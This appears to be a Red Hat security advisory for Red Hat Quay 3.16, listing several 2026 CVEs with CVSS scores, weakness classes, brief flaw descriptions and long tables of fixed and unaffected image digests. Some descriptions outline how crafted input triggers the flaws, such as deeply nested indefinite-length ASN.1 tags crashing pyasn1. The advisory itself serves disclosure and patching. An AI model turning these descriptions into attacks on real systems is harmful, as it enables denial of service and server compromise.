Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:f610987c52a000670dd5ba0a943f8d3ca38cdd71a0239a95b93260b4ce254b7b_amd64	—	Workaround
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:6c64c35079e0af57beeb1dec93cad23c91dbfca34d25ecdf6326cdf5d557e1b9_amd64	—	Workaround
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:25be6b83e985ef60d32dec94f57f530b8a4be88c6f23627789f11eb4a0e8870b_amd64	—	Workaround
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:34d0eac97f889384b67037fdf957e53c02c7ec2579e436e28f49b66d586062cf_ppc64le	—	Workaround
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:8d71f18daf54d0311be34071b85d6f48c2895785c986e31a218cd748c443d60b_s390x	—	Workaround
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:ae76dd5965cf14d53a81b5e88ec2f9406d12834a8f5fb1f3ee14fc3271ecceee_amd64	—	Workaround
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:2fc63e77e837796a5082b58defffc6c46a9a4e8038190c9b8f87213bdf46c006_amd64	—	Workaround
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:622a11babb195484a89cad806b9b79b6a99df53ad6ebb3d3d68b0a97ded78f79_ppc64le	—	Workaround
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:9e77748984103da9604314a20f66f4fe9710f645dec385b1069ea20d9d0c6ed1_s390x	—	Workaround
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-bundle@sha256:631c61a88de857bac8503386173a7689c462cfa07141969beb1ab958d85996a3_amd64	—	Workaround
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:2c5d16299741b7ebcb712479d5c82bb4fa498c6e043786abbff4c52b982c4879_s390x	—	Workaround
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:74cda2cf2b38b3cd62e5527e421dd7fbe756350e326e0b385ad9518302e08f03_amd64	—	Workaround
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:e77909a680cd9586f86b793363ffcba2352d25b2c255e7608582e6e7a6659ff2_ppc64le	—	Workaround

Threats

Impact Important

CVE-2026-30922

An unbounded recursion flaw has been discovered in the pypi pyasn1 library. This uncontrolled recursion occurs when decoding ASN.1 data with deeply nested structures. An attacker can supply a crafted payload containing nested SEQUENCE (0x30) or SET (0x31) tags with Indefinite Length (0x80) markers. This forces the decoder to recursively call itself until the Python interpreter crashes with a RecursionError or consumes all available memory (OOM), crashing the host application.

7.5 (High)


                        
                          CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

CWE-835 - Loop with Unreachable Exit Condition ('Infinite Loop')

Affected products

Fixed 4 products

Product	Version	Remediation
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:139cae64e4790ebf8b760c6376a33d15233222a25e4da39c6062d7e46c3a1bef_amd64	—	Vendor Fix fix Workaround
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:52883f389182907dec0e286d626c4faea0f4ae29a5d0e841d6ad2287fdb964c2_arm64	—	Vendor Fix fix Workaround
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:ad162e6ea2f6fd246f605180699ce36e4ea91c4b551c7af600a64e671a303ee9_s390x	—	Vendor Fix fix Workaround
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:f6a15c2f1b4d5900cdbd366080e40d3a90d51ba9e5b4d6196e15eefe69d902c3_ppc64le	—	Vendor Fix fix Workaround

Known not affected 19 products

Product	Version	Remediation
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:478f0e44eaf9907d18c8e765b16d80b9cc0bb3eac50ff8e118e3349aa29a9b46_ppc64le	—	Workaround
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:4e7266596726edd7cde2b55bd7bed8910f4cbc1b310c11557e3552239ed3750f_s390x	—	Workaround
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:f423a53dff70862980ee4381a9fe0fb5d19ce4d9932d7784491d057671d1fc2e_amd64	—	Workaround
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:203097d7c260c95d7cf8e14a378542f75aae84f234a28d61d419f7b434562a9f_amd64	—	Workaround
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:116b0249564f8424a5438e4a2edd0a9fa8c9449c4cea1ac1b642904d46dccf2f_ppc64le	—	Workaround
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:68e02cfb3de2728a3f7f3cdd7b3ab231aa50ff51be51455bf1015ebc8addac66_s390x	—	Workaround
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:f610987c52a000670dd5ba0a943f8d3ca38cdd71a0239a95b93260b4ce254b7b_amd64	—	Workaround
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:6c64c35079e0af57beeb1dec93cad23c91dbfca34d25ecdf6326cdf5d557e1b9_amd64	—	Workaround
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:25be6b83e985ef60d32dec94f57f530b8a4be88c6f23627789f11eb4a0e8870b_amd64	—	Workaround
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:34d0eac97f889384b67037fdf957e53c02c7ec2579e436e28f49b66d586062cf_ppc64le	—	Workaround
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:8d71f18daf54d0311be34071b85d6f48c2895785c986e31a218cd748c443d60b_s390x	—	Workaround
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:ae76dd5965cf14d53a81b5e88ec2f9406d12834a8f5fb1f3ee14fc3271ecceee_amd64	—	Workaround
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:2fc63e77e837796a5082b58defffc6c46a9a4e8038190c9b8f87213bdf46c006_amd64	—	Workaround
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:622a11babb195484a89cad806b9b79b6a99df53ad6ebb3d3d68b0a97ded78f79_ppc64le	—	Workaround
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:9e77748984103da9604314a20f66f4fe9710f645dec385b1069ea20d9d0c6ed1_s390x	—	Workaround
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-bundle@sha256:631c61a88de857bac8503386173a7689c462cfa07141969beb1ab958d85996a3_amd64	—	Workaround
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:2c5d16299741b7ebcb712479d5c82bb4fa498c6e043786abbff4c52b982c4879_s390x	—	Workaround
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:74cda2cf2b38b3cd62e5527e421dd7fbe756350e326e0b385ad9518302e08f03_amd64	—	Workaround
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:e77909a680cd9586f86b793363ffcba2352d25b2c255e7608582e6e7a6659ff2_ppc64le	—	Workaround

Threats

Impact Important

CVE-2026-32280

7.5 (High)


                        
                          CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

CWE-770 - Allocation of Resources Without Limits or Throttling

Affected products

Fixed 4 products

Product	Version	Remediation
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:139cae64e4790ebf8b760c6376a33d15233222a25e4da39c6062d7e46c3a1bef_amd64	—	Vendor Fix fix
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:52883f389182907dec0e286d626c4faea0f4ae29a5d0e841d6ad2287fdb964c2_arm64	—	Vendor Fix fix
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:ad162e6ea2f6fd246f605180699ce36e4ea91c4b551c7af600a64e671a303ee9_s390x	—	Vendor Fix fix
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:f6a15c2f1b4d5900cdbd366080e40d3a90d51ba9e5b4d6196e15eefe69d902c3_ppc64le	—	Vendor Fix fix

Known not affected 19 products

Product	Identifier	Version	Remediation
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:478f0e44eaf9907d18c8e765b16d80b9cc0bb3eac50ff8e118e3349aa29a9b46_ppc64le		—
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:4e7266596726edd7cde2b55bd7bed8910f4cbc1b310c11557e3552239ed3750f_s390x		—
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:f423a53dff70862980ee4381a9fe0fb5d19ce4d9932d7784491d057671d1fc2e_amd64		—
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:203097d7c260c95d7cf8e14a378542f75aae84f234a28d61d419f7b434562a9f_amd64		—
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:116b0249564f8424a5438e4a2edd0a9fa8c9449c4cea1ac1b642904d46dccf2f_ppc64le		—
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:68e02cfb3de2728a3f7f3cdd7b3ab231aa50ff51be51455bf1015ebc8addac66_s390x		—
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:f610987c52a000670dd5ba0a943f8d3ca38cdd71a0239a95b93260b4ce254b7b_amd64		—
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:6c64c35079e0af57beeb1dec93cad23c91dbfca34d25ecdf6326cdf5d557e1b9_amd64		—
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:25be6b83e985ef60d32dec94f57f530b8a4be88c6f23627789f11eb4a0e8870b_amd64		—
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:34d0eac97f889384b67037fdf957e53c02c7ec2579e436e28f49b66d586062cf_ppc64le		—
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:8d71f18daf54d0311be34071b85d6f48c2895785c986e31a218cd748c443d60b_s390x		—
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:ae76dd5965cf14d53a81b5e88ec2f9406d12834a8f5fb1f3ee14fc3271ecceee_amd64		—
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:2fc63e77e837796a5082b58defffc6c46a9a4e8038190c9b8f87213bdf46c006_amd64		—
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:622a11babb195484a89cad806b9b79b6a99df53ad6ebb3d3d68b0a97ded78f79_ppc64le		—
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:9e77748984103da9604314a20f66f4fe9710f645dec385b1069ea20d9d0c6ed1_s390x		—
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-bundle@sha256:631c61a88de857bac8503386173a7689c462cfa07141969beb1ab958d85996a3_amd64		—
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:2c5d16299741b7ebcb712479d5c82bb4fa498c6e043786abbff4c52b982c4879_s390x		—
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:74cda2cf2b38b3cd62e5527e421dd7fbe756350e326e0b385ad9518302e08f03_amd64		—
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:e77909a680cd9586f86b793363ffcba2352d25b2c255e7608582e6e7a6659ff2_ppc64le		—

Threats

Impact Important

CVE-2026-32282

7.8 (High)


                        
                          CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:H

CWE-367 - Time-of-check Time-of-use (TOCTOU) Race Condition

Affected products

Fixed 4 products

Product	Version	Remediation
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:139cae64e4790ebf8b760c6376a33d15233222a25e4da39c6062d7e46c3a1bef_amd64	—	Vendor Fix fix Workaround
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:52883f389182907dec0e286d626c4faea0f4ae29a5d0e841d6ad2287fdb964c2_arm64	—	Vendor Fix fix Workaround
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:ad162e6ea2f6fd246f605180699ce36e4ea91c4b551c7af600a64e671a303ee9_s390x	—	Vendor Fix fix Workaround
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:f6a15c2f1b4d5900cdbd366080e40d3a90d51ba9e5b4d6196e15eefe69d902c3_ppc64le	—	Vendor Fix fix Workaround

Known not affected 19 products

Product	Version	Remediation
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:478f0e44eaf9907d18c8e765b16d80b9cc0bb3eac50ff8e118e3349aa29a9b46_ppc64le	—	Workaround
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:4e7266596726edd7cde2b55bd7bed8910f4cbc1b310c11557e3552239ed3750f_s390x	—	Workaround
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:f423a53dff70862980ee4381a9fe0fb5d19ce4d9932d7784491d057671d1fc2e_amd64	—	Workaround
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:203097d7c260c95d7cf8e14a378542f75aae84f234a28d61d419f7b434562a9f_amd64	—	Workaround
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:116b0249564f8424a5438e4a2edd0a9fa8c9449c4cea1ac1b642904d46dccf2f_ppc64le	—	Workaround
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:68e02cfb3de2728a3f7f3cdd7b3ab231aa50ff51be51455bf1015ebc8addac66_s390x	—	Workaround
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:f610987c52a000670dd5ba0a943f8d3ca38cdd71a0239a95b93260b4ce254b7b_amd64	—	Workaround
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:6c64c35079e0af57beeb1dec93cad23c91dbfca34d25ecdf6326cdf5d557e1b9_amd64	—	Workaround
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:25be6b83e985ef60d32dec94f57f530b8a4be88c6f23627789f11eb4a0e8870b_amd64	—	Workaround
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:34d0eac97f889384b67037fdf957e53c02c7ec2579e436e28f49b66d586062cf_ppc64le	—	Workaround
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:8d71f18daf54d0311be34071b85d6f48c2895785c986e31a218cd748c443d60b_s390x	—	Workaround
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:ae76dd5965cf14d53a81b5e88ec2f9406d12834a8f5fb1f3ee14fc3271ecceee_amd64	—	Workaround
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:2fc63e77e837796a5082b58defffc6c46a9a4e8038190c9b8f87213bdf46c006_amd64	—	Workaround
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:622a11babb195484a89cad806b9b79b6a99df53ad6ebb3d3d68b0a97ded78f79_ppc64le	—	Workaround
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:9e77748984103da9604314a20f66f4fe9710f645dec385b1069ea20d9d0c6ed1_s390x	—	Workaround
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-bundle@sha256:631c61a88de857bac8503386173a7689c462cfa07141969beb1ab958d85996a3_amd64	—	Workaround
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:2c5d16299741b7ebcb712479d5c82bb4fa498c6e043786abbff4c52b982c4879_s390x	—	Workaround
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:74cda2cf2b38b3cd62e5527e421dd7fbe756350e326e0b385ad9518302e08f03_amd64	—	Workaround
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:e77909a680cd9586f86b793363ffcba2352d25b2c255e7608582e6e7a6659ff2_ppc64le	—	Workaround

Threats

Impact Moderate

CVE-2026-32286

A flaw was found in the DataRow.Decode function within the github.com/jackc/pgproto3/v2 component. A malicious or compromised PostgreSQL server can exploit this by sending a DataRow message containing a negative field length. This improper validation of field lengths leads to a "slice bounds out of range panic", resulting in a Denial of Service (DoS) for the affected application.

7.5 (High)


                        
                          CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

CWE-1285 - Improper Validation of Specified Index, Position, or Offset in Input

Affected products

Fixed 4 products

Product	Version	Remediation
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:139cae64e4790ebf8b760c6376a33d15233222a25e4da39c6062d7e46c3a1bef_amd64	—	Vendor Fix fix Workaround
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:52883f389182907dec0e286d626c4faea0f4ae29a5d0e841d6ad2287fdb964c2_arm64	—	Vendor Fix fix Workaround
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:ad162e6ea2f6fd246f605180699ce36e4ea91c4b551c7af600a64e671a303ee9_s390x	—	Vendor Fix fix Workaround
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:f6a15c2f1b4d5900cdbd366080e40d3a90d51ba9e5b4d6196e15eefe69d902c3_ppc64le	—	Vendor Fix fix Workaround

Known not affected 19 products

Product	Version	Remediation
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:478f0e44eaf9907d18c8e765b16d80b9cc0bb3eac50ff8e118e3349aa29a9b46_ppc64le	—	Workaround
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:4e7266596726edd7cde2b55bd7bed8910f4cbc1b310c11557e3552239ed3750f_s390x	—	Workaround
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:f423a53dff70862980ee4381a9fe0fb5d19ce4d9932d7784491d057671d1fc2e_amd64	—	Workaround
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:203097d7c260c95d7cf8e14a378542f75aae84f234a28d61d419f7b434562a9f_amd64	—	Workaround
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:116b0249564f8424a5438e4a2edd0a9fa8c9449c4cea1ac1b642904d46dccf2f_ppc64le	—	Workaround
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:68e02cfb3de2728a3f7f3cdd7b3ab231aa50ff51be51455bf1015ebc8addac66_s390x	—	Workaround
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:f610987c52a000670dd5ba0a943f8d3ca38cdd71a0239a95b93260b4ce254b7b_amd64	—	Workaround
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:6c64c35079e0af57beeb1dec93cad23c91dbfca34d25ecdf6326cdf5d557e1b9_amd64	—	Workaround
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:25be6b83e985ef60d32dec94f57f530b8a4be88c6f23627789f11eb4a0e8870b_amd64	—	Workaround
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:34d0eac97f889384b67037fdf957e53c02c7ec2579e436e28f49b66d586062cf_ppc64le	—	Workaround
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:8d71f18daf54d0311be34071b85d6f48c2895785c986e31a218cd748c443d60b_s390x	—	Workaround
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:ae76dd5965cf14d53a81b5e88ec2f9406d12834a8f5fb1f3ee14fc3271ecceee_amd64	—	Workaround
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:2fc63e77e837796a5082b58defffc6c46a9a4e8038190c9b8f87213bdf46c006_amd64	—	Workaround
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:622a11babb195484a89cad806b9b79b6a99df53ad6ebb3d3d68b0a97ded78f79_ppc64le	—	Workaround
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:9e77748984103da9604314a20f66f4fe9710f645dec385b1069ea20d9d0c6ed1_s390x	—	Workaround
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-bundle@sha256:631c61a88de857bac8503386173a7689c462cfa07141969beb1ab958d85996a3_amd64	—	Workaround
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:2c5d16299741b7ebcb712479d5c82bb4fa498c6e043786abbff4c52b982c4879_s390x	—	Workaround
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:74cda2cf2b38b3cd62e5527e421dd7fbe756350e326e0b385ad9518302e08f03_amd64	—	Workaround
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:e77909a680cd9586f86b793363ffcba2352d25b2c255e7608582e6e7a6659ff2_ppc64le	—	Workaround

Threats

Impact Important

CVE-2026-32589

A flaw was found in Red Hat Quay's container image upload process. An authenticated user with push access to any repository on the registry can interfere with image uploads in progress by other users, including those in repositories they do not have access to. This could allow the attacker to read, modify, or cancel another user's in-progress image upload.

7.4 (High)


                        
                          CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:L

CWE-639 - Authorization Bypass Through User-Controlled Key

Affected products

Fixed 4 products

Product	Version	Remediation
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:139cae64e4790ebf8b760c6376a33d15233222a25e4da39c6062d7e46c3a1bef_amd64	—	Vendor Fix fix
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:52883f389182907dec0e286d626c4faea0f4ae29a5d0e841d6ad2287fdb964c2_arm64	—	Vendor Fix fix
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:ad162e6ea2f6fd246f605180699ce36e4ea91c4b551c7af600a64e671a303ee9_s390x	—	Vendor Fix fix
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:f6a15c2f1b4d5900cdbd366080e40d3a90d51ba9e5b4d6196e15eefe69d902c3_ppc64le	—	Vendor Fix fix

Known not affected 19 products

Product	Identifier	Version	Remediation
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:478f0e44eaf9907d18c8e765b16d80b9cc0bb3eac50ff8e118e3349aa29a9b46_ppc64le		—
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:4e7266596726edd7cde2b55bd7bed8910f4cbc1b310c11557e3552239ed3750f_s390x		—
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:f423a53dff70862980ee4381a9fe0fb5d19ce4d9932d7784491d057671d1fc2e_amd64		—
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:203097d7c260c95d7cf8e14a378542f75aae84f234a28d61d419f7b434562a9f_amd64		—
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:116b0249564f8424a5438e4a2edd0a9fa8c9449c4cea1ac1b642904d46dccf2f_ppc64le		—
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:68e02cfb3de2728a3f7f3cdd7b3ab231aa50ff51be51455bf1015ebc8addac66_s390x		—
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:f610987c52a000670dd5ba0a943f8d3ca38cdd71a0239a95b93260b4ce254b7b_amd64		—
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:6c64c35079e0af57beeb1dec93cad23c91dbfca34d25ecdf6326cdf5d557e1b9_amd64		—
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:25be6b83e985ef60d32dec94f57f530b8a4be88c6f23627789f11eb4a0e8870b_amd64		—
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:34d0eac97f889384b67037fdf957e53c02c7ec2579e436e28f49b66d586062cf_ppc64le		—
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:8d71f18daf54d0311be34071b85d6f48c2895785c986e31a218cd748c443d60b_s390x		—
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:ae76dd5965cf14d53a81b5e88ec2f9406d12834a8f5fb1f3ee14fc3271ecceee_amd64		—
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:2fc63e77e837796a5082b58defffc6c46a9a4e8038190c9b8f87213bdf46c006_amd64		—
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:622a11babb195484a89cad806b9b79b6a99df53ad6ebb3d3d68b0a97ded78f79_ppc64le		—
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:9e77748984103da9604314a20f66f4fe9710f645dec385b1069ea20d9d0c6ed1_s390x		—
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-bundle@sha256:631c61a88de857bac8503386173a7689c462cfa07141969beb1ab958d85996a3_amd64		—
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:2c5d16299741b7ebcb712479d5c82bb4fa498c6e043786abbff4c52b982c4879_s390x		—
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:74cda2cf2b38b3cd62e5527e421dd7fbe756350e326e0b385ad9518302e08f03_amd64		—
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:e77909a680cd9586f86b793363ffcba2352d25b2c255e7608582e6e7a6659ff2_ppc64le		—

Threats

Impact Important

CVE-2026-32590

A flaw was found in Red Hat Quay's handling of resumable container image layer uploads. The upload process stores intermediate data in the database using a format that, if tampered with, could allow an attacker to execute arbitrary code on the Quay server.

7.1 (High)


                        
                          CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:U/C:H/I:H/A:H

CWE-502 - Deserialization of Untrusted Data

Affected products

Fixed 4 products

Product	Version	Remediation
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:139cae64e4790ebf8b760c6376a33d15233222a25e4da39c6062d7e46c3a1bef_amd64	—	Vendor Fix fix
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:52883f389182907dec0e286d626c4faea0f4ae29a5d0e841d6ad2287fdb964c2_arm64	—	Vendor Fix fix
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:ad162e6ea2f6fd246f605180699ce36e4ea91c4b551c7af600a64e671a303ee9_s390x	—	Vendor Fix fix
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:f6a15c2f1b4d5900cdbd366080e40d3a90d51ba9e5b4d6196e15eefe69d902c3_ppc64le	—	Vendor Fix fix

Known not affected 19 products

Product	Identifier	Version	Remediation
